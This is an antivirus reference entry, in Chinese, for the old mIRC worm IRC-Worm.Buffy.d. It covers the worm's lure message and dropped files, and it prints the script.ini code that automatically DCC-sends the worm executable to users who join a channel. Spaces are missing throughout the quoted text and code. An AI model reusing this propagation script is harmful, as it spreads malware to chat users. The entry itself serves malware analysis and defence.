病毒名称(中文):
蝴蝶
病毒别名:
IRC-Worm.Buffy.d[AVP]
威胁级别:
★★☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
163904
影响系统:
Win9xWinNT
病毒行为:
这是一个通过mIRC传播的蠕虫病毒。该病毒登陆到mIRC的virus频道向用户发送病毒文件并发送消息“Inevery
generationthereisachosenone...Shealonewillstandagainstthevampires,thedemons,andtheforcesof
darkness...Sheistheslayer...”诱骗用户运行。它运行的时候将自己拷贝到C:\BTVS.exe,释放文件C:\Mirc\Script.ini、
C:\Windows\Winstart.bat和C:\Windows\StartMenu\Programs\Startup\Start.vbs。
1)拷贝病毒到C:\BTVS.exe
2)释放3个文件:
C:\Mirc\Script.ini
C:\Windows\Winstart.bat
C:\Windows\StartMenu\Programs\Startup\Start.vbs
3)Script.ini的内容:
[script]\nn0=ON1:JOIN:#:{/if($nick==$me){halt}\nn1=/dccsend$nickc:/BTVS.exe\nn2=}\n
n3=ON1:CONNECT:/join#virus|/timer512/msg#virusIneverygenerationthereisachosenone...Shealonewill
standagainstthevampires,thedemons,andtheforcesofdarkness...Sheistheslayer...|/timer415/part
#virus
4)c:\windows\winstart.bat的内容:
@cls
@echoWeliketotalkbig.Vampiresdo."I"mgoingtodestroytheworld."
@echoThat"sjusttoughguytalk.Struttingaroundwithyourfriends
@echooverapintofblood.Thetruthis,Ilikethisworld.You"vegot...
@echodogracing,ManchesterUnited.Andyou"vegotpeople.Billionsofpeople
@echowalkingaroundlikeHappyMealswithlegs.It"sallrighthere.Butthen
@echosomeonecomesalongwithavision.Withareal...passionfordestruction.
@echoAngelcouldpullitoff.Goodbye,Picadilly.Farewell,LeicesterBloodySquare.YouknowwhatI"msaying?